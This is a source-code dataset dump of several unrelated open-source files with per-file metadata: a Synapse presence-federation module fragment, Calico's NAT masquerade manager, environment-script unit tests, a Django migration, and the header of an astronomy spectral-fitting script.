user_states: List of UserPresenceState's to check.
is_mine_fn: Function that returns if a user_id is ours
syncing_user_ids: Set of user_ids with active syncs.
now: Current time in ms.
Returns:
List of UserPresenceState updates
"""
changes = {} # Actual changes we need to notify people about
for state in user_states:
is_mine = is_mine_fn(state.user_id)
new_state = handle_timeout(state, is_mine, syncing_user_ids, now)
if new_state:
changes[state.user_id] = new_state
return list(changes.values())
def handle_timeout(
state: UserPresenceState, is_mine: bool, syncing_user_ids: Set[str], now: int
) -> Optional[UserPresenceState]:
"""Checks the presence of the user to see if any of the timers have elapsed
Args:
state
is_mine: Whether the user is ours
syncing_user_ids: Set of user_ids with active syncs.
now: Current time in ms.
Returns:
A UserPresenceState update or None if no update.
"""
if state.state == PresenceState.OFFLINE:
# No timeouts are associated with offline states.
return None
changed = False
user_id = state.user_id
if is_mine:
if state.state == PresenceState.ONLINE:
if now - state.last_active_ts > IDLE_TIMER:
# Currently online, but last activity ages ago so auto
# idle
state = state.copy_and_replace(state=PresenceState.UNAVAILABLE)
changed = True
elif now - state.last_active_ts > LAST_ACTIVE_GRANULARITY:
# So that we send down a notification that we've
# stopped updating.
changed = True
if now - state.last_federation_update_ts > FEDERATION_PING_INTERVAL:
# Need to send ping to other servers to ensure they don't
# timeout and set us to offline
changed = True
# If there have been no syncs for a while (and none ongoing),
# set presence to offline
if user_id not in syncing_user_ids:
# If the user has done something recently but hasn't synced,
# don't set them as offline.
sync_or_active = max(state.last_user_sync_ts, state.last_active_ts)
if now - sync_or_active > SYNC_ONLINE_TIMEOUT:
state = state.copy_and_replace(state=PresenceState.OFFLINE)
changed = True
else:
# We expect to be poked occasionally by the other side.
# This is to protect against forgetful/buggy servers, so that
# no one gets stuck online forever.
if now - state.last_federation_update_ts > FEDERATION_TIMEOUT:
# The other side seems to have disappeared.
state = state.copy_and_replace(state=PresenceState.OFFLINE)
changed = True
return state if changed else None
def handle_update(
prev_state: UserPresenceState,
new_state: UserPresenceState,
is_mine: bool,
wheel_timer: WheelTimer,
now: int,
) -> Tuple[UserPresenceState, bool, bool]:
"""Given a presence update:
1. Add any appropriate timers.
2. Check if we should notify anyone.
Args:
prev_state
new_state
is_mine: Whether the user is ours
wheel_timer
now: Time now in ms
Returns:
3-tuple: `(new_state, persist_and_notify, federation_ping)` where:
- new_state: is the state to actually persist
- persist_and_notify: whether to persist and notify people
- federation_ping: whether we should send a ping over federation
"""
user_id = new_state.user_id
persist_and_notify = False
federation_ping = False
# If the users are ours then we want to set up a bunch of timers
# to time things out.
if is_mine:
if new_state.state == PresenceState.ONLINE:
# Idle timer
wheel_timer.insert(
now=now, obj=user_id, then=new_state.last_active_ts + IDLE_TIMER
)
active = now - new_state.last_active_ts < LAST_ACTIVE_GRANULARITY
new_state = new_state.copy_and_replace(currently_active=active)
if active:
wheel_timer.insert(
now=now,
obj=user_id,
then=new_state.last_active_ts + LAST_ACTIVE_GRANULARITY,
)
if new_state.state != PresenceState.OFFLINE:
# User has stopped syncing
wheel_timer.insert(
now=now,
obj=user_id,
then=new_state.last_user_sync_ts + SYNC_ONLINE_TIMEOUT,
)
last_federate = new_state.last_federation_update_ts
if now - last_federate > FEDERATION_PING_INTERVAL:
# Been a while since we've poked remote servers
new_state = new_state.copy_and_replace(last_federation_update_ts=now)
federation_ping = True
else:
wheel_timer.insert(
now=now,
obj=user_id,
then=new_state.last_federation_update_ts + FEDERATION_TIMEOUT,
)
# Check whether the change was something worth notifying about
if should_notify(prev_state, new_state):
new_state = new_state.copy_and_replace(last_federation_update_ts=now)
persist_and_notify = True
return new_state, persist_and_notify, federation_ping
async def get_interested_parties(
store: DataStore, presence_router: PresenceRouter, states: List[UserPresenceState]
) -> Tuple[Dict[str, List[UserPresenceState]], Dict[str, List[UserPresenceState]]]:
"""Given a list of states return which entities (rooms, users)
are interested in the given states.
Args:
store: The homeserver's data store.
presence_router: A module for augmenting the destinations for presence updates.
states: A list of incoming user presence updates.
Returns:
A 2-tuple of `(room_ids_to_states, users_to_states)`,
with each item being a dict of `entity_name` -> `[UserPresenceState]`
"""
room_ids_to_states: Dict[str, List[UserPresenceState]] = {}
users_to_states: Dict[str, List[UserPresenceState]] = {}
for state in states:
room_ids = await store.get_rooms_for_user(state.user_id)
for room_id in room_ids:
room_ids_to_states.setdefault(room_id, []).append(state)
# Always notify self
users_to_states.setdefault(state.user_id, []).append(state)
# Ask a presence routing module for any additional parties if one
# is loaded.
router_users_to_states = await presence_router.get_users_for_states(states)
# Update the dictionaries with additional destinations and state to send
for user_id, user_states in router_users_to_states.items():
users_to_states.setdefault(user_id, []).extend(user_states)
return room_ids_to_states, users_to_states
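# Illustrative sketch (not part of the original module): for a single state of
# @alice:example.com who is joined to !room1:hs and !room2:hs, the return value
# looks roughly like
#
#     room_ids_to_states == {"!room1:hs": [state], "!room2:hs": [state]}
#     users_to_states    == {"@alice:example.com": [state]}
#
# plus any extra user keys contributed by the configured presence router.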
async def get_interested_remotes(
store: DataStore,
presence_router: PresenceRouter,
states: List[UserPresenceState],
) -> Dict[str, Set[UserPresenceState]]:
"""Given a list of presence states figure out which remote servers
should be sent which.
All the presence states should be for local users only.
Args:
store: The homeserver's data store.
presence_router: A module for augmenting the destinations for presence updates.
states: A list of incoming user presence updates.
Returns:
A map from destinations to presence states to send to that destination.
"""
hosts_and_states: Dict[str, Set[UserPresenceState]] = {}
# First we look up the rooms each user is in (as well as any explicit
# subscriptions), then for each distinct room we look up the remote
# hosts in those rooms.
room_ids_to_states, users_to_states = await get_interested_parties(
store, presence_router, states
)
for room_id, states in room_ids_to_states.items():
user_ids = await store.get_users_in_room(room_id)
hosts = {get_domain_from_id(user_id) for user_id in user_ids}
for host in hosts:
hosts_and_states.setdefault(host, set()).update(states)
for user_id, states in users_to_states.items():
host = get_domain_from_id(user_id)
hosts_and_states.setdefault(host, set()).update(states)
return hosts_and_states
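# Illustrative sketch (not part of the original module): continuing the example
# above, if !room1:hs also contains @bob:remote.example then the result maps
# each destination domain to the set of states it should receive, e.g.
#
#     {"example.com": {state}, "remote.example": {state}}
#
# (the local domain can appear as a key too, since the mapping is built purely
# from the domain part of each user ID).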
class PresenceFederationQueue:
"""Handles sending ad hoc presence updates over federation, which are *not*
due to state updates (that get handled via the presence stream), e.g.
federation pings and sending existing presence states to newly joined hosts.
Only the last N minutes will be queued, so if a federation sender instance
is down for longer than that, some updates will be dropped. This is OK as presence
is ephemeral, and so it will self-correct eventually.
On workers the class tracks the last received position of the stream from
replication, and handles querying for missed updates over HTTP replication,
c.f. `get_current_token` and `get_replication_rows`.
"""
# How long to keep entries in the queue for. Workers that are down for
# longer than this duration will miss out on older updates.
_KEEP_ITEMS_IN_QUEUE_FOR_MS = 5 * 60 * 1000
# How often to check if we can expire entries from the queue.
_CLEAR_ITEMS_EVERY_MS = 60 * 1000
def __init__(self, hs: "HomeServer", presence_handler: BasePresenceHandler):
self._clock = hs.get_clock()
self._notifier = hs.get_notifier()
self._instance_name = hs.get_instance_name()
self._presence_handler = presence_handler
self._repl_client = ReplicationGetStreamUpdates.make_client(hs)
# Should we keep a queue of recent presence updates? We only bother if
# another process may be handling federation sending.
self._queue_presence_updates = True
# Whether this instance is a presence writer.
self._presence_writer = self._instance_name in hs.config.worker.writers.presence
# The FederationSender instance, if this process sends federation traffic directly.
self._federation = None
if hs.should_send_federation():
self._federation = hs.get_federation_sender()
# We don't bother queuing up presence states if only this instance
# is sending federation.
if hs.config.worker.federation_shard_config.instances == [
self._instance_name
]:
self._queue_presence_updates = False
# The queue of recently queued updates as tuples of: `(timestamp,
# stream_id, destinations, user_ids)`. We don't store the full states
# for efficiency, and remote workers will already have the full states
# cached.
self._queue: List[Tuple[int, int, Collection[str], Set[str]]] = []
self._next_id = 1
# Map from instance name to current token
self._current_tokens: Dict[str, int] = {}
if self._queue_presence_updates:
self._clock.looping_call(self._clear_queue, self._CLEAR_ITEMS_EVERY_MS)
def _clear_queue(self) -> None:
"""Clear out older entries from the queue."""
clear_before = self._clock.time_msec() - self._KEEP_ITEMS_IN_QUEUE_FOR_MS
# The queue is sorted by timestamp, so we can bisect to find the right
# place to purge before. Note that we are searching using a 1-tuple with
# the time, which does The Right Thing since each queue entry is a tuple where
# the first item is a timestamp.
index = bisect(self._queue, (clear_before,))
self._queue = self._queue[index:]
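# Illustrative sketch (not part of the original module): Python's element-wise
# tuple comparison is what makes the 1-tuple bisect above work, e.g.
#
#     from bisect import bisect
#     queue = [(10, 1, (), set()), (20, 2, (), set()), (30, 3, (), set())]
#     bisect(queue, (20,))  # == 1, so queue[1:] keeps entries with timestamp >= 20
#
# because a shorter tuple sorts before any longer tuple that it is a prefix of.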
def send_presence_to_destinations(
self, states: Collection[UserPresenceState], destinations: Collection[str]
) -> None:
"""Send the presence states to the given destinations.
Will forward to the local federation sender (if there is one) and queue
to send over replication (if there are other federation sender instances).
Must only be called on the presence writer process.
"""
# This should only be called on a presence writer.
assert self._presence_writer
if self._federation:
self._federation.send_presence_to_destinations(
states=states,
destinations=destinations,
)
if not self._queue_presence_updates:
return
now = self._clock.time_msec()
stream_id = self._next_id
self._next_id += 1
self._queue.append((now, stream_id, destinations, {s.user_id for s in states}))
self._notifier.notify_replication()
def get_current_token(self, instance_name: str) -> int:
"""Get the current position of the stream.
On workers this returns the last stream ID received from replication.
"""
if instance_name == self._instance_name:
return self._next_id - 1
else:
return self._current_tokens.get(instance_name, 0)
async def get_replication_rows(
self,
instance_name: str,
from_token: int,
upto_token: int,
target_row_count: int,
) -> Tuple[List[Tuple[int, Tuple[str, str]]], int, bool]:
"""Get all the updates between the two tokens.
We return rows in the form of `(destination, user_id)` to keep the size
of each row bounded (rather than returning the sets in a row).
On workers this will query the presence writer process via HTTP replication.
"""
if instance_name != self._instance_name:
# If not local we query over http replication from the presence
# writer
result = await self._repl_client(
instance_name=instance_name,
stream_name=PresenceFederationStream.NAME,
from_token=from_token,
upto_token=upto_token,
)
return result["updates"], result["upto_token"], result["limited"]
# If the from_token is the current token then there's nothing to return
# and we can trivially no-op.
if from_token == self._next_id - 1:
return [], upto_token, False
# We can find the correct position in the queue by noting that there is
# exactly one entry per stream ID, and that the last entry has an ID of
# `self._next_id - 1`, so we can count backwards from the end.
#
# Since we are returning all states in the range `from_token < stream_id
# <= upto_token` we look for the index with a `stream_id` of `from_token
# + 1`.
#
# Since the start of the queue is periodically truncated we need to
# handle the case where `from_token` stream ID has already been dropped.
start_idx = max(from_token + 1 - self._next_id, -len(self._queue))
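# Illustrative worked example (not part of the original module): if _next_id is
# 10 then the last queued entry has stream_id 9; with from_token == 6 we want
# entries 7..9, and 6 + 1 - 10 == -3 selects exactly the last three entries.
# The max() with -len(self._queue) stops us indexing before the start of the
# queue when older entries have already been truncated.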
to_send: List[Tuple[int, Tuple[str, str]]] = []
limited = False
new_id = upto_token
for _, stream_id, destinations, user_ids in self._queue[start_idx:]:
if stream_id <= from_token:
# Paranoia check that we are actually only sending states that
# have a stream_id strictly greater than from_token. We should
# never hit this.
logger.warning(
"Tried returning presence federation stream ID: %d less than from_token: %d (next_id: %d, len: %d)",
stream_id,
from_token,
self._next_id,
len(self._queue),
)
continue
if stream_id > upto_token:
break
new_id = stream_id
to_send.extend(
(stream_id, (destination, user_id))
for destination in destinations
for user_id in user_ids
)
if len(to_send) > target_row_count:
limited = True
break
return to_send, new_id, limited
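# Illustrative sketch (not part of the original module): a queue entry with
# stream_id 7, destinations {"hs1", "hs2"} and user_ids {"@a:local"} is
# flattened by the loop above into the rows
#
#     (7, ("hs1", "@a:local")) and (7, ("hs2", "@a:local"))
#
# which keeps each replication row small at the cost of repeating the stream ID.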
async def process_replication_rows(
self, stream_name: str, instance_name: str, token: int, rows: list
) -> None:
if stream_name != PresenceFederationStream.NAME:
return
# We keep track of the current tokens (so that we can catch up with anything we missed after a disconnect)
self._current_tokens[instance_name] = token
# If we're a federation sender we pull out the presence states to send
# and forward them on.
if not self._federation:
return
hosts_to_users: Dict[str, Set[str]] = {}
for row in rows:
hosts_to_users.setdefault(row.destination, set()).add(row.user_id)
for host, user_ids in hosts_to_users.items():
states = await self._presence_handler.current_state_for_users(user_ids)
self._federation.send_presence_to_destinations(
states=states.values(),
destinations=[host],
)
| 39.241516
| 120
| 0.630263
|
f81aeeec280f77bc24902490501e04982a13ac5c
| 4,474
|
py
|
Python
|
calico/felix/masq.py
|
robbrockbank/felix
|
3429099d677bec0caa3dd9b8d69d1553304741ca
|
[
"Apache-2.0"
] | null | null | null |
calico/felix/masq.py
|
robbrockbank/felix
|
3429099d677bec0caa3dd9b8d69d1553304741ca
|
[
"Apache-2.0"
] | null | null | null |
calico/felix/masq.py
|
robbrockbank/felix
|
3429099d677bec0caa3dd9b8d69d1553304741ca
|
[
"Apache-2.0"
] | 1
|
2016-12-02T12:08:32.000Z
|
2016-12-02T12:08:32.000Z
|
# Copyright (c) Metaswitch Networks 2015. All rights reserved.
import logging
from calico.felix.actor import Actor, actor_message
from calico.felix.futils import IPV4, IPV6
from calico.felix.ipsets import Ipset, FELIX_PFX
_log = logging.getLogger(__name__)
ALL_POOLS_SET_NAME = FELIX_PFX + "all-ipam-pools"
MASQ_POOLS_SET_NAME = FELIX_PFX + "masq-ipam-pools"
MASQ_RULE_FRAGMENT = ("POSTROUTING "
"--match set --match-set %s src "
"--match set ! --match-set %s dst "
"--jump MASQUERADE" % (MASQ_POOLS_SET_NAME,
ALL_POOLS_SET_NAME))
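# Illustrative note (not part of the original file): assuming FELIX_PFX expands
# to something like "felix-", the fragment above renders (on one line) roughly as
#
#   POSTROUTING --match set --match-set felix-masq-ipam-pools src
#               --match set ! --match-set felix-all-ipam-pools dst
#               --jump MASQUERADE
#
# i.e. masquerade traffic leaving a masquerade-enabled pool only when the
# destination is not in any Calico-owned pool.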
class MasqueradeManager(Actor):
def __init__(self, ip_type, iptables_mgr):
super(MasqueradeManager, self).__init__(qualifier=str(ip_type))
assert ip_type in (IPV4, IPV6)
assert iptables_mgr.table == "nat"
self.ip_type = ip_type
self.pools_by_id = {}
self._iptables_mgr = iptables_mgr
ip_family = "inet" if ip_type == IPV4 else "inet6"
self._all_pools_ipset = Ipset(ALL_POOLS_SET_NAME,
ALL_POOLS_SET_NAME + "-tmp",
ip_family,
"hash:net")
self._masq_pools_ipset = Ipset(MASQ_POOLS_SET_NAME,
MASQ_POOLS_SET_NAME + "-tmp",
ip_family,
"hash:net")
self._dirty = False
@actor_message()
def apply_snapshot(self, pools_by_id):
_log.info("Applying IPAM pool snapshot with %s pools",
len(pools_by_id))
self.pools_by_id.clear()
self.pools_by_id.update(pools_by_id)
self._dirty = True
@actor_message()
def on_ipam_pool_updated(self, pool_id, pool):
if self.pools_by_id.get(pool_id) != pool:
if pool is None:
_log.info("IPAM pool deleted: %s", pool_id)
del self.pools_by_id[pool_id]
else:
_log.info("IPAM pool %s updated: %s", pool_id, pool)
self.pools_by_id[pool_id] = pool
self._dirty = True
def _finish_msg_batch(self, batch, results):
_log.debug("Finishing batch of IPAM pool changes")
if self._dirty:
_log.info("Marked as dirty, looking for masq-enabled pools")
masq_enabled_cidrs = set()
all_cidrs = set()
for pool in self.pools_by_id.itervalues():
all_cidrs.add(pool["cidr"])
if pool.get("masquerade", False):
masq_enabled_cidrs.add(pool["cidr"])
if masq_enabled_cidrs:
_log.info("There are masquerade-enabled pools present. "
"Updating.")
self._all_pools_ipset.replace_members(all_cidrs)
self._masq_pools_ipset.replace_members(masq_enabled_cidrs)
# Enable masquerading for traffic coming from pools that
# have it enabled only when the traffic is heading to an IP
# that isn't in any Calico-owned pool. (We assume that NAT
# is not required for Calico-owned IPs.)
self._iptables_mgr.ensure_rule_inserted(MASQ_RULE_FRAGMENT,
async=True)
else:
_log.info("No masquerade-enabled pools present. "
"Removing rules and ipsets.")
# We can only have programmed the rule if the ipsets are
# present. If they're not present, iptables rejects the
# delete with an error that IptablesUpdater doesn't expect.
if (self._all_pools_ipset.exists() and
self._masq_pools_ipset.exists()):
# Have to make a blocking call so that we don't try to
# remove the ipsets before we've cleaned up the rule that
# references them.
self._iptables_mgr.ensure_rule_removed(MASQ_RULE_FRAGMENT,
async=False)
# Safe to call even if the ipsets don't exist:
self._all_pools_ipset.delete()
self._masq_pools_ipset.delete()
self._dirty = False
_log.info("Finished refreshing ipsets")
| 45.653061
| 78
| 0.55342
|
70051a80a6fe715d06d72097c84ac89cd03e85c7
| 6,384
|
py
|
Python
|
tests/lib/bes/env/test_env_dir.py
|
reconstruir/bes
|
82ff54b2dadcaef6849d7de424787f1dedace85c
|
[
"Apache-2.0"
] | null | null | null |
tests/lib/bes/env/test_env_dir.py
|
reconstruir/bes
|
82ff54b2dadcaef6849d7de424787f1dedace85c
|
[
"Apache-2.0"
] | null | null | null |
tests/lib/bes/env/test_env_dir.py
|
reconstruir/bes
|
82ff54b2dadcaef6849d7de424787f1dedace85c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
import copy, os, os.path as path
from bes.testing.unit_test import unit_test
from bes.system.os_env import os_env
from bes.system.env_override import env_override
from bes.fs.file_util import file_util
from bes.fs.temp_file import temp_file
from bes.fs.testing.temp_content import temp_content
from bes.env.env_dir import env_dir
from bes.env.env_dir import action
class test_env_dir(unit_test):
_TEST_ITEMS = [
'file 1.sh "export A=1\n" 644',
'file 2.sh "export B=2\n" 644',
'file 3.sh "export C=3\n" 644',
'file 4.sh "export D=4\n" 644',
'file 5.sh "export E=5\n" 644',
'file 6.sh "unset F\n" 644',
]
def test_files(self):
ed = self._make_temp_env_dir(self._TEST_ITEMS)
self.assertEqual( [ '1.sh', '2.sh', '3.sh', '4.sh', '5.sh', '6.sh' ], ed.files )
def test_files_explicit(self):
ed = self._make_temp_env_dir(self._TEST_ITEMS, files = [ '1.sh', '3.sh', '5.sh' ])
self.assertEqual( [ '1.sh', '3.sh', '5.sh' ], ed.files )
def test_files_not_found(self):
with self.assertRaises(IOError) as ctx:
self._make_temp_env_dir(self._TEST_ITEMS, files = [ 'notthere.sh' ])
def test_instructions_set(self):
ed = self._make_temp_env_dir([
'file 1.sh "export FOO=1\n" 644',
])
env = {}
self.assertEqual( [
( 'FOO', '1', action.SET ),
], ed.instructions({}) )
def test_instructions_path_prepend(self):
ed = self._make_temp_env_dir([
'file 1.sh "export PATH=/foo/bin:$PATH\n" 644',
])
env = {
'PATH': '/usr/bin:/bin',
}
self.assertEqual( [
( 'PATH', '/foo/bin', action.PATH_PREPEND ),
], ed.instructions(env) )
def test_instructions_path_append(self):
ed = self._make_temp_env_dir([
'file 1.sh "export PATH=$PATH:/foo/bin\n" 644',
])
env = {
'PATH': '/usr/bin:/bin',
}
self.assertEqual( [
( 'PATH', '/foo/bin', action.PATH_APPEND ),
], ed.instructions(env) )
def test_instructions_path_remove(self):
ed = self._make_temp_env_dir([
'file 1.sh "export PATH=/usr/bin:/bin\n" 644',
])
env = {
'PATH': '/usr/bin:/my/path:/bin',
}
self.assertEqual( [
( 'PATH', '/my/path', action.PATH_REMOVE ),
], ed.instructions(env) )
def test_foo(self):
env = {
'SOMETHINGIMADEUP': 'GOOD',
'PATH': '/bin:/usr/bin:/my/path:/sbin'
}
with env_override(env = env) as tmp_env:
tmp_dir = self.make_temp_dir()
temp_content.write_items([
'file 1.sh "export PATH=/bin:/usr/bin:/sbin\n" 644',
'file 2.sh "export BAR=orange\n" 644',
'file 3.sh "export PATH=/a/bin:$PATH\nexport PATH=/b/bin:$PATH\n" 644',
'file 4.sh "export FOO=kiwi\n" 644',
'file 5.sh "export PATH=$PATH:/x/bin\nPATH=$PATH:/y/bin\n" 644',
'file 6.sh "unset SOMETHINGIMADEUP\n" 644',
], tmp_dir)
ed = env_dir(tmp_dir)
self.assertEqual( [ '1.sh', '2.sh', '3.sh', '4.sh', '5.sh', '6.sh' ], ed.files )
self.assertEqual( [
( 'BAR', 'orange', action.SET ),
( 'FOO', 'kiwi', action.SET ),
( 'PATH', '/a/bin', action.PATH_PREPEND ),
( 'PATH', '/b/bin', action.PATH_PREPEND ),
( 'PATH', '/my/path', action.PATH_REMOVE ),
( 'PATH', '/x/bin', action.PATH_APPEND ),
( 'PATH', '/y/bin', action.PATH_APPEND ),
( 'SOMETHINGIMADEUP', None, action.UNSET ),
], ed.instructions(tmp_env.to_dict()) )
# self.assertEqual( {
# 'BAR': 'orange',
# 'FOO': 'kiwi',
# 'PATH': '/b/bin:/a/bin:/x/bin:/y/bin',
# }, ed.transform_env({}) )
# self.assertEqual( {
# 'BAR': 'orange',
# 'FOO': 'kiwi',
# 'PATH': '/b/bin:/a/bin:/x/bin:/y/bin',
# }, ed.transform_env({ 'SOMETHINGIMADEUP': 'yes' }) )
#
# self.assertEqual( {
# 'BAR': 'orange',
# 'FOO': 'kiwi',
# 'PATH': '/b/bin:/a/bin:/usr/local/bin:/usr/foo/bin:/x/bin:/y/bin',
# }, ed.transform_env({ 'PATH': '/usr/local/bin:/usr/foo/bin' }) )
def _make_temp_env_dir(self, items, files = None):
tmp_dir = self.make_temp_dir()
temp_content.write_items(items, tmp_dir)
return env_dir(tmp_dir, files = files)
def test_transform_env_empty(self):
current_env = {}
current_env_save = copy.deepcopy(current_env)
ed = self._make_temp_env_dir([])
transformed_env = ed.transform_env(current_env)
self.assertEqual( current_env_save, current_env )
expected = {
}
self.assert_dict_as_text_equal( expected, transformed_env )
def test_transform_env_append(self):
current_env = {
'PYTHONPATH': '/p/lib/python',
'PATH': '/p/bin',
}
current_env_save = copy.deepcopy(current_env)
ed = self._make_temp_env_dir([
'file 1.sh "export PATH=$PATH:/foo/bin\n" 644',
'file 2.sh "export PYTHONPATH=$PYTHONPATH:/foo/lib/python\n" 644',
])
transformed_env = ed.transform_env(current_env)
self.assertEqual( current_env_save, current_env )
expected = {
'PATH': '/p/bin:/foo/bin',
'PYTHONPATH': '/p/lib/python:/foo/lib/python',
}
self.assert_dict_as_text_equal( expected, transformed_env )
def test_transform_env_set(self):
current_env = {}
ed = self._make_temp_env_dir([
'file 1.sh "export PATH=$PATH:/foo/bin\n" 644',
'file 2.sh "export PYTHONPATH=$PYTHONPATH:/foo/lib/python\n" 644',
'file 3.sh "export %s=$%s:/foo/lib\n" 644' % (os_env.LD_LIBRARY_PATH_VAR_NAME,
os_env.LD_LIBRARY_PATH_VAR_NAME),
])
transformed_env = ed.transform_env(current_env)
default_PATH = os_env.default_system_value('PATH')
self.assertEqual( {
'PATH': '%s:/foo/bin' % (default_PATH),
'PYTHONPATH': ':/foo/lib/python',
os_env.LD_LIBRARY_PATH_VAR_NAME: ':/foo/lib',
}, transformed_env )
def test_transform_env_unset(self):
current_env = {}
ed = self._make_temp_env_dir([
'file 1.sh "export FOO=foo\n" 644',
'file 2.sh "export BAR=bar\n" 644',
'file 3.sh "unset FOO\n" 644',
])
transformed_env = ed.transform_env(current_env)
self.assertEqual( {
'BAR': 'bar',
}, transformed_env )
if __name__ == '__main__':
unit_test.main()
| 33.957447
| 90
| 0.597901
|
e3efff21bbc524059fb54383569b88071d6cca1f
| 85
|
py
|
Python
|
foo_package/private_module.py
|
peter-stoyanov/Python
|
52ddb70537c05caa0d87740493b7b1f974191984
|
[
"MIT"
] | null | null | null |
foo_package/private_module.py
|
peter-stoyanov/Python
|
52ddb70537c05caa0d87740493b7b1f974191984
|
[
"MIT"
] | null | null | null |
foo_package/private_module.py
|
peter-stoyanov/Python
|
52ddb70537c05caa0d87740493b7b1f974191984
|
[
"MIT"
] | null | null | null |
"""Doc"""
def privateDoSmth():
"""Doc"""
if __name__ == '__main__':
main()
| 10.625
| 26
| 0.517647
|
8234be1c19c6ebcd79e07a92d9101d86f3ebc14c
| 415
|
py
|
Python
|
orm/migrations/0004_auto_20180903_0140.py
|
chateval/chatevalv2
|
7ba96d81842db00427a6d6351d5cea76a8766450
|
[
"Apache-2.0"
] | 5
|
2018-06-11T19:47:23.000Z
|
2020-03-04T01:29:15.000Z
|
orm/migrations/0004_auto_20180903_0140.py
|
chateval/app
|
7ba96d81842db00427a6d6351d5cea76a8766450
|
[
"Apache-2.0"
] | 12
|
2018-07-11T18:50:13.000Z
|
2022-02-10T10:45:58.000Z
|
orm/migrations/0004_auto_20180903_0140.py
|
chateval/app
|
7ba96d81842db00427a6d6351d5cea76a8766450
|
[
"Apache-2.0"
] | 1
|
2018-06-29T14:52:16.000Z
|
2018-06-29T14:52:16.000Z
|
# Generated by Django 2.0.7 on 2018-09-03 01:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orm', '0003_auto_20180903_0136'),
]
operations = [
migrations.AlterField(
model_name='evaluationdataset',
name='baselines',
field=models.ManyToManyField(blank=True, to='orm.Model'),
),
]
| 21.842105
| 69
| 0.612048
|
845945d70de95927130daf2672c055b3430ed8b2
| 553,648
|
py
|
Python
|
badass.py
|
remingtonsexton/BADASS
|
905e03c57ece61f11db81544bb7b9167f831c08c
|
[
"MIT"
] | null | null | null |
badass.py
|
remingtonsexton/BADASS
|
905e03c57ece61f11db81544bb7b9167f831c08c
|
[
"MIT"
] | null | null | null |
badass.py
|
remingtonsexton/BADASS
|
905e03c57ece61f11db81544bb7b9167f831c08c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Bayesian AGN Decomposition Analysis for SDSS Spectra (BADASS3)
BADASS is an open-source spectral analysis tool designed for detailed decomposition
of Sloan Digital Sky Survey (SDSS) spectra, and specifically designed for the
fitting of Type 1 ("broad line") Active Galactic Nuclei (AGN) in the optical.
The fitting process utilizes the Bayesian affine-invariant Markov-Chain Monte
Carlo sampler emcee for robust parameter and uncertainty estimation, as well
as autocorrelation analysis to access parameter chain convergence.
"""
import numpy as np
from numpy.polynomial import hermite
from numpy import linspace, meshgrid
import scipy.optimize as op
import pandas as pd
import numexpr as ne
import matplotlib.pyplot as plt
from matplotlib import cm
import matplotlib.gridspec as gridspec
from scipy import optimize, linalg, special, fftpack
from scipy.interpolate import griddata, interp1d
from scipy.stats import f, chisquare
from scipy import stats
import scipy
from scipy.integrate import simps
from astropy.io import fits
import glob
import time
import datetime
from os import path
import os
import shutil
import sys
from astropy.stats import mad_std
from scipy.special import wofz
import emcee
from astroquery.irsa_dust import IrsaDust
import astropy.units as u
from astropy import coordinates
from astropy.cosmology import FlatLambdaCDM
import re
import natsort
import copy
# import StringIO
import psutil
import pathlib
import importlib
import multiprocessing as mp
import bifrost
import spectres
# Import BADASS tools modules
cwd = os.getcwd() # get current working directory
sys.path.insert(1,cwd+'/badass_tools/')
import badass_utils as badass_utils
plt.style.use('dark_background') # For cool tron-style dark plots
import matplotlib
matplotlib.rcParams['agg.path.chunksize'] = 100000
import warnings
warnings.filterwarnings("ignore", category=RuntimeWarning)
warnings.filterwarnings("ignore", category=UserWarning)
__author__ = "Remington O. Sexton (GMU/USNO), Sara M. Doan (GMU), Michael A. Reefe (GMU), William Matzko (GMU), Nicholas Darden (UCR)"
__copyright__ = "Copyright (c) 2021 Remington Oliver Sexton"
__credits__ = ["Remington O. Sexton (GMU/USNO)", "Sara M. Doan (GMU)", "Michael A. Reefe (GMU)", "William Matzko (GMU)", "Nicholas Darden (UCR)"]
__license__ = "MIT"
__version__ = "9.1.6"
__maintainer__ = "Remington O. Sexton"
__email__ = "rsexton2@gmu.edu"
__status__ = "Release"
##########################################################################################################
# Note: Minor tweaks needed to port Python 2 version of BADASS into Python 3 (thanks to W. Matzko).
# - First, I had to set dtype = [("fluxes",dict)]. Without the brackets [], you get the error
# TypeError: data type "fluxes" not understood. Adding the additional brackets causes subsequent
# results to be returned in brackets. To that end, I needed to make the following changes in the
# flux_plots() function:
# ~line 5180: for key in flux_blob[0][0]: --> for key in flux_blob[0][0][0]:
# ~line 5196: same change as above
# ~line 5200: flux_dict[key]['chain'][j,i] = flux_blob[i][j][key] --> flux_dict[key]['chain'][j,i] = flux_blob[i][j][0][key]
# Comment out "import StringIO" (not needed)
# TypeError, " " -> TypeError(" ")
##########################################################################################################
# Revision History
# Versions 1-5
# - Very unstable, lots of bugs, kinda messy, not many options or features. We've made a lot of front- and back-end changes and improvements.
# - Versions 1-4 were not very flexible, and were originally optimized for Keck LRIS spectra (See
# [Sexton et al. (2019)](https://ui.adsabs.harvard.edu/abs/2019ApJ...878..101S/abstract)) and then optimized for large samples of SDSS spectra.
# - In Version 5 we performed a complete overhaul with more options, features. The most improved-upon feature was the addition of autocorrelation
# analysis for parameter chain convergence, which now produces the most robust estimates.
# Version 6
# - Improved autocorrelation analysis and options. One can now choose the number of autocorrelation times and tolerance for convergence.
# Posterior sampling now restarts if solution jumps prematurely out of convergence.
# - Simplified the Jupyter Notebook control panel and layout. Most of the BADASS machinery is now contained in the badass_v6_0.py file.
# - Output of black hole mass based on availability of broad line (based on Woo et al. (2015) (https://ui.adsabs.harvard.edu/abs/2015ApJ...801...38W/abstract)
# H-alpha BH mass estimate, and Sexton et al. (2019) (https://ui.adsabs.harvard.edu/abs/2019ApJ...878..101S/abstract) H-beta BH mass estimate.
# - Output of systemic stellar velocity (redshift) and it's uncertainty.
# - Output of BPT diagnostic ratios and plot if both H$\alpha$ and H$\beta$ regions are fit simultaneously.
# - Minor memory leak improvements by optimizing plotting functions and deleting large arrays from memory via garbage collection.
# - Fixed issues with the outflow test function
# - Added minimum S/N option for fitting the LOSVD
# - MCMC fitting with emcee is now optional with `mcmc_fit`; one can fit using only Monte Carlo bootstrapping with any number of `max_like_niter` iterations
# to estimate uncertainties if one does not require a fit of the LOSVD. If you need LOSVD measurements, you still must (and *should*) use emcee.
# - One can now perform more than a single maximum likelihood fit for initial parameter values for emcee by changing `max_like_niter`; be advised this will
# take longer for large regions of spectra, but generally produces better initial parameter values.
